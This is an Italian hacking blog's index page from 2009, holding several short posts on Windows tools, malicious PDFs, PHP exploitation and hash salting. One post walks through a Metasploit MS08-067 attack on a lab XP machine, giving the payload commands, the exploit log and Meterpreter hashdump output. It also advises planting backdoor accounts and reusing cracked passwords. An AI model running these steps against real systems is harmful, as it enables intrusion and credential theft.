Iscriviti ai Feeds Rss
Ricevi gli aggiornamenti nella tua email:


lug
1st

Come Visualizzare Velocemente i Driver Installati su Windows

Autore: Angelo Righi | Files under Utilities

Esistono programmi freeware estremamente interessanti e utili che permettono di gestire ogni aspetto di Windows. In un articolo passato ho presentato sette programmi per mantenere in forma il computer. Uno di quei sette programmi è DriverView. Bello utile e potente, freeware e portatile, ovvero non necessita di installazione.

Ma a volte non è necessario scaricare nulla, basta usare le risorse di Windows.
Esiste infatti una utility di Windows che permette di fare le stesse cose di DriverView, ovvero visualizzare la lista dei driver con relativa versione, utility già installata e disponibile dalla linea di comando.

Sto parlando di Driverquery. Questo programma permette di visualizzare la lista dei driver installati sul proprio computer o su di un computer remoto. Offre la possibilità di salvare il risultato in diversi formati:

  • Tabella: Quattro colonne, “Nome modulo”, “Nome visualizzato”,  “Tipo di driver” e “Data collegamento”
  • Lista: In questa modalità l’output è organizzato in righe, dove le informazione relative ad ogni singolo driver sono mostrate una sotto l’altra, le quattro colonne della modalità tabella diventano quattro righe.
  • CSV: Formato “Comma Separated Values”, valori separati da virgola, formato utile se si vuole importare la lista in un foglio di calcolo (o in un database) per successive elaborazioni.

Con Driverquery chi non si spaventa della linea di comando si trova a disposizione uno strumento assai utile sia per la diagnostica, sia per la raccolta di informazioni nella fase post-exploit.

Usarla è semplice, basta aprire il prompt dei comandi e digitare driverquery. Se non si specificano opzioni il programma presenta l’output in formato tabella. Per cambiare il tipo di output si utilizza l’opzione /FO, specificando di seguito il tipo di formato richiesto, “TABLE”, “LIST” o “CSV”. Utilizzando il carattere > è possibile reindirizzare l’output in un file.

Per accedere ad una macchina remota si deve usare l’opzione /S e specificare il nome (o l’indirizzo) del sistema a cui ci si vuole collegare; bisogna inoltre specificare il nome utente (/U) e la password con l’opzione /P. Quest’ultima opzione può essere omessa: sarà il sistema a chiederla al momento dell’accesso.


Articoli Simili

2 Comments
giu
30th

PillolHacking.Net: I Migliori Articoli di Giugno 2009

Autore: Angelo Righi | Files under PillolHacking

Ecco i migliori articoli di PillolHacking.Net del mese di Giugno 2009. La lista completa la potetetrovare qui.

1. Il PDF ti Infetta Anche se non lo Apri

2. [eBook] Assault on PHP Applications

3. Come Liberare Rapidamente i File Bloccati

4. Come Prelevare le Password di Windows da Remoto

5. Risparmia Tempo e Fatica con i Code Snippets

Chi non l’ha già fatto può iscriversi ai Feeds Rss o tramite Email, per non perdere nessun aggiornamento.


Articoli Simili

No Comments
giu
25th

Il PDF ti Infetta Anche se non lo Apri

Autore: Angelo Righi | Files under Malware

Uno degli articoli più interessanti di Insecure Magazine 21 è “Malicous PDF: Get owned without opening”, scritto da Didier Steves.

Quella di utilizzare documenti multimediali per distribuire malware è una tattica consolidata. Sono stati protagonisti di questa tendenza praticamente tutti i formati più diffusi, dai formati video ai fogli di calcolo Excel, ai Powerpoint. Questa tattica viene ampiamente sfruttata anche per la creazione di botnet.

Negli ultimi mesi è stato il formato PDF ad essere al centro dell’attenzione. In diverse occasioni questo formato è stato vettore di infezioni zero-day.

In genere per innescare l’attività di un virus è necessaria l’interazione dell’utente. Una volta ricevuta l’email maligna, l’utente la consulta, apre l’allegato e parte l’infezione.Didier Stevens ha scoperto che in alcuni casi, anzi in un caso particolare, l’infezione parte senza l’interazione dell’utente. Come? Explorer lavora per gli hacker…

Explorer (ovvero Esplora Risorse, non Internet Explorer) è il programma di Windows che permette di navigare nel file system. Una delle caratteristiche più comode di Explorer è il menù che appare col tasto destro. Questo menù può essere modificato da applicazioni di terze parti, per aggiungere funzionalità. Per esempio, un programma di compressione può aggiungere la voce “comprimi il file…” senza costringere l’utente a peripezie tra icone e menù di avvio per lanciare l’applicazione. Questo è solo un esempio.

Questa caratteristica è resa disponibile da Windows Explorer Shell Extensions. Questo componente di Windows che permette di estendere le funzionalità di Explorer, permette anche di personalizzaere le colonne di infornazione di Explorer stesso, per esempio aggiungendo alle colonne Nome, Dimensione e Tipo altre colonne. Questo avviene tramite il Column Handler Shell Extension. Adobe Reader installa esattamente un Column Handler per aggiungere la colonna Titolo.

Quando un file PDF viene messo in una cartella l’interazione dell’utente non serve; è Explorer, tramite l’estensione installata da Adobe Reader, che si prende cura di accedere al file PDF per estrapolare alcuni dati (in questo caso il titolo) da presentare poi nella colonna Titolo. Ma se il bug si annida proprio negli elementi necessari per questa operazione, la consultazione automatica del PDF innescherà il bug e di seguito l’esecuzione di codice introdotta dall’hacker come payload nel file PDF corrotto, con conseguente infezione o “affiliazione” del sistema ad una botnet.

Penserete voi: una piccola interazione da parte dell’utente c’è. E’ comunque necessario visualizzare il contenuto della cartella. E’ vero, ma è una magra consolazione. Inoltre c’è dell’altro. Se il servizio di indicizzazione diWindows è attivo, l’indicizzazione automatica del PDF innescherà ancora una volta la vulnerabilità. Non solo: il servizio di indicizzazione gira con privilegi system. Di conseguenza l’exploit verrebbe eseguito con i privilegi più alti.

Insomma, è possibile creare PDF corrotti contenenti malware, la cui capacità di infettare il sistema è garantita dal fatto che l’interazione dell’utente non è necessaria.
Le vie dell’infezione virale sono infinite.


Articoli Simili

7 Comments
giu
22nd

[eBook] Assault on PHP Applications

Autore: Angelo Righi | Files under Hacking

Assault on PHP Applications (PHP vulnerability exploitation)” è un ebook gratuito scritto da Aelphais Mangarae in lingua inglese, che illustra le più comuni vulnerabilità delle applicazioni PHP, e i metodi per sfruttarle.

Questo documento, disponibile in formato pdf, illustra in modo sintetico i metodi più diffusi per ottenere accessi remoti attaccando le applicazioni PHP, ovvero la maggior parte di siti Internet.

Un attacco portato con successo ad una web-application può condurre ad un controllo totale, prima della macchina aggredita, e successivamente al resto del sistema, come illustrato in questo altro interessante ebook.

Gli argomenti trattati nell’ebook sono i seguenti:

  • File inclusion vulnerability
  • File upload vulnerability
  • Disk file read/write vulnerability
  • Command execution vulnerability
  • SQL Injection vulnerability
  • Insecure cookie handling

Tutti i capitoli sono arricchiti da esempi pratici e dall’analisi delle vulnerabilità studiando i codici sorgenti. Per poter apprendere e apprezzare a fondo le tecniche illustrate è necessario avere delle basi diPHP e della struttura di un’applicazione web  e delle interazioni che questa compie con il web server e con il database (Mysql in questi esempi).

Lo studio approfondito di questo bellissimo ebook mette in condizione il lettore di acquisire le tecniche base che permettono l’effettuazione efficace di penetration test contro piattaforme PHP e di comprendere il funzionamento degli exploit reperibili in rete.

Chi fosse invece interessato ad un’introduzione generale e più semplificata alle tematiche dell’hacking, può trovare interessante l’Hacker’s Underground Handbook di cui ho parlato alcune settimane fa.

Assault on PHP Applications può essere scaricato da questo link.


Articoli Simili

2 Comments
mar
9th

Un Articolo dal Passato:
Contromisure al Cracking degli Hash (e contro-contromisure)

Autore: Angelo Righi | Files under Crypto, Password

Le funzioni hash sono funzioni in grado di produrre un risultato univoco di lunghezza fissa partendo da un parametro di lunghezza variabile. Inoltre sono irreversibili: dal risultato non si può risalire al dato originale. Altre considerazioni sulle funzioni hash possono essere trovate nell’articolo  Introduzione alle funzioni hash.

Queste funzioni sono spesso utilizzare per cifrare password. Infatti nei database le password non vengono memorizzate in chiaro ma in codice hash irreversibile, in genere md5 o sha1.

Gli hash non sono reversibili ma sono craccabili. Utilizzando le cosiddette rainbow tables, gigantesche tabelle di lookup precalcolate è possibile risalire in pochi secondi al valore originale che ha originato il codice cifrato. Inoltre è facile reperire su Internet siti che mettono a disposizione il servizio di lookup degli hash.

Una contromisura a questo tipo di attacco è quella di aggiungere alla password un altro valore. Un’idea potrebbe essere quella di aggiungere il nome utente concatenandolo alla password prima di sottoporlo alla funzione hash.

Se per esempio inserisco l’hash della password ‘pippo’, ovvero ‘0c88028bf3aa6a6a143ed846f2be1ea4′ in un servizio di lookup di cui parlavo prima ottengo immediatamente la password in chiaro (ovvero ‘pippo’).

Se invece concateno la password al nome utente, e l’utente in questione è ‘admin’ il codice hash non sarà più ‘0c88028bf3aa6a6a143ed846f2be1ea4′ bensì ‘4daf4b83ca0f88d95f0a26d96aadda03′  più difficile da trovare nei servizi online, ma ancora non al sicuro dagli attacchi rainbow tables.

Se oltre al nome utente si aggiungono altri valori costanti di 10 o più caratteri alfanumerici e contenenti caratteri speciali la sicurezza della password si alza notevolmente, rendendo il compito dei cracker assai meno agevole.

Quello crittografico è un settore delicatissimo e improvvisarsi esperti è sconsigliato; affidarsi al fai da te è un approccio letale. Se si ha la necessità di aggiungere sicurezza alle proprie applicazioni conviene rivolgersi a soluzioni collaudate.

Una di queste è Phpass, framework di hashing creato da Openwall e utilizzato da popolari CMS come Drupal e Wordpress.

Naturalmente qualcuno ha creato un brute forcer in Python per attaccarlo.


Articoli Simili

2 Comments
giu
18th

Come Liberare Rapidamente i File Bloccati

Autore: Angelo Righi | Files under Download, Risorse

Talvolta capita che ci si trovi nella deprecabile situazione in cui un file si ribella e non ha la minima intenzione di essere cancellato. Questa assurda volontà si manifesta con un odioso messaggio: “Cannot delete file: Access is denied”, o con una variante leggermente più esplicativa (”The file is in use by another program or user”), ma pur sempre irritante.

Ad aiutarci a risolvere questo problema ci pensa Unlocker, un programma free che sblocca (o almeno ci prova) i file che sono bloccati da altre applicazioni. L’uso è semplice: una volta installato Unlocker aggiunge un’estensione al menu contestuale di Esplora Risorse, quello che appara premendo il tasto destro del mouse per intenderci.

Quando vi trovate nella condizione citata prima, dove un file non può essere cancellato, per sbloccarlo è sufficiente selezionarlo col mouse e quindi cliccare il tasto destro. Tra le opzioni del menu apparirà Unlocker. Selezionando quest’opzione apparirà una finestra contenente la lista dei processi che tengono in ostaggio il file bloccato. A questo punto si può scegliere tra diverse opzioni: unlock,  kill process, unlock all. Nella maggior parte dei casi scegliendo unlock il file verrà liberato. In rari casi sarà necessario “killare” il processo sequestratore.

Unlocker è un programma gratuito e potente. Sul sito che lo ospita è pubblicata una tabella comparativa tra una ventina di software con funzionalità simili, gratuiti e a pagamento. Naturalmente Unlocker vince alla grande.

Unlocker funziona su Windows, da 2000 a Vista. Lo uso da diversi anni e spesso l’ho trovato utilissimo; in qualche occasione potrebbe tornare utile anche a voi.


Articoli Simili

No Comments
giu
15th

Come Prelevare le Password di Windows da Remoto

Autore: Angelo Righi | Files under Hacking

Craccare le password di Windows è ormai un gioco da ragazzi. Addirittura con Kon-Boot è possibile loggarsi in qualsiasi Linux o Windows aggirando il meccanismo di autenticazione. Tutto questo a patto che si abbia accesso fisico alla macchina. Se il computer dal quale vogliamo prelevare (e quindi craccare) le password si trova in un luogo a noi inaccessibile (o in un altro continente…) le cose si complicano. Ma non troppo.

Questo articolo completa un precedente post: “Hackerare Windows con Metasploit“. Chi se lo è perso se lo vada a rileggere e poi si iscriva a PillolHacking.Net per evitare di perdere i prossimi articoli.

Nel suddetto articolo viene mostrato come accedere da remoto a Windows sfruttando un recente bug, utilizzando Metasploit Framework, potentissimo strumento per effettuare penetration test.
Il precedente articolo si fermava dopo avere effettuato l’intrusione. Questa volta parliamo di cosa fare dopo aver effettuato un accesso remoto sulla macchina target.

Avere accesso ad una shell Windows da remoto è molto utile e si possono già fare diverse cose per mantenere un accesso anche nel caso in cui il bug venisse patchato. Ricordo che entrare continuamente in un computer tramite un exploit non è un’idea brillante, per diversi motivi. Uno di questi è che  aumenta il rischio di essere scoperti, e può bastare.
Quindi una volta entrati in un sistema è possibile installare una backdoor. Per esempio è possibile aggiungere un utente con privilegi di amministratore. Ma qualsiasi backdoor può essere scoperta.

Il modo migliore per effettuare un’intrusione furtiva, da autentico fantasma della rete, è entrare, prelevare il SAM database, ovvero il file dove vengono memorizzate le password cifrate, craccarle e tornare nel sistema come un qualsiasi utente autorizzato, il tutto senza dare nell’occhio. Per non dimenticare un altro aspetto del password cracking: spesso gli utenti usano la stessa password per diversi servizi/sistemi. Recuperando la password di un sistema può aprire le porte a sistemi ben più preziosi all’interno di una organizzazione.

Per ottenere il nostro scopo, ovvero prelevare il SAM database da remoto utilizzeremo uno strumento spettacolare: Meterpreter. Si tratta di un modulo di Metasploit per la fase di post-penetration. Viene iniettato direttamente dall’exploit nel sistema remoto e mette a disposizione dell’hacker un ambiente in grado di effettuare qualsiasi operazione sul sistema target. Prima della nascita di Meterpreter questa fase era assai più complessa, visto che prevede la necessità di caricare in qualche modo tools aggiuntivi sul server. Con Meterpreter non serve nulla. Eventuali nuovi moduli possono essere caricati con un semplice comando.

Torniamo alle password. Per recuperare il SAM database della macchina target utilizziamo il comando hashdump di Meterpreter. L’operazione è semplicissima: una volta effettuata l’intrusione è necessario attivare il modulo priv (user priv) e di seguito invocare il comando hashdump.
Per quanto riguarda i dettagli per effettuare l’intrusione rimando all’articolo già citato. La differenza da quell’aticolo è il payload utilizzato. Se in quell’occasione avevo utilizzato un semplice shell/bind_tcp:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp

Questa volta uso meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

Questo è il log dell’esecuzione dell’exploit contro il mio Xp virtualizzato, la macchina più vulnerabile del pianeta, il cui indirizzo Ip è 192.168.132.128; la macchina dell’attaccante è una Batcktrack3 con Ip 192.168.132.129; l’exploit è il ms08_067_netapi:


[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Italian
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.129:58221 -> 192.168.132.128:4444)

meterpreter > use priv
[-] The ‘priv’ extension has already been loaded.
meterpreter > hashdump
Administrator:500:68a828b9dbd542feaad3b435b51404ee:0ebd3febdb972b9d9a164b72f321e341:::
pippo:1004:68a828b9dbd542feaad3b435b51404ee:0ebd3febdb972b9d9a164b72f321e341:::
meterpreter >

Il gioco è fatto! Il dump del SAM database è stato effettuato. A questo punto non rimane che passare alla fase di cracking.


Articoli Simili

8 Comments
giu
12th

Scarica Gratis Insecure Magazine 21

Autore: Angelo Righi | Files under Risorse, Security

E’ disponibile per il download (gratuito) la nuova edizione di Insecure Magazine. La rivista internazionale che tratta temi e presenta approfondimenti dal mondo della sicurezza informatica, giunta al numero 21, presenta in questa edizione alcuni articoli particolarmente interessanti:

  • Malicious PDF: Get owned without opening
  • Review: IronKey Personal
  • Windows 7 security features: Building on Vista
  • Using Wireshark to capture and analyze wireless traffic
  • “Unclonable” RFID – a technical overview
  • Secure development principles
  • Q&A: Ron Gula on Nessus and Tenable Network Security
  • Establish your social media presence with security in mind
  • A historical perspective on the cybersecurity dilemma
  • A risk-based, cost effective approach to holistic security

L’articolo “Malicious PDF: Get owned without opening” è particolarmente attuale. Negli ultimi mesi i prodotti Adobe sono stati al centro di numerosi incidenti di sicurezza, e il formato pdf è stato spesso utilizzato come vettore per infezioni virali insidiose, cosa che ha spinto la celebre software house a rivedere le proprie strategie difensive. In questo articolo viene spiegato che (e come) un’infezione virtale può innescarsi senza la minima interazione da parte dell’utente.

Si parla anche della sicurezza di Windows 7 la cui uscita è ormai imminente. Altro articolo interessante che probabilmente approfondirò in questa sede prossimamente è “Secure development principles”: l’insicurezza dei dati e dei computer ha origine dallo sviluppo dei programmi, da qui bisogna partire a costruire software più solidi.

Chi non si lascia intimorire della lingua inglese lo scarichi e lo divori.


Articoli Simili

1 Comment
Pagina successiva »
--> Learn How To Hack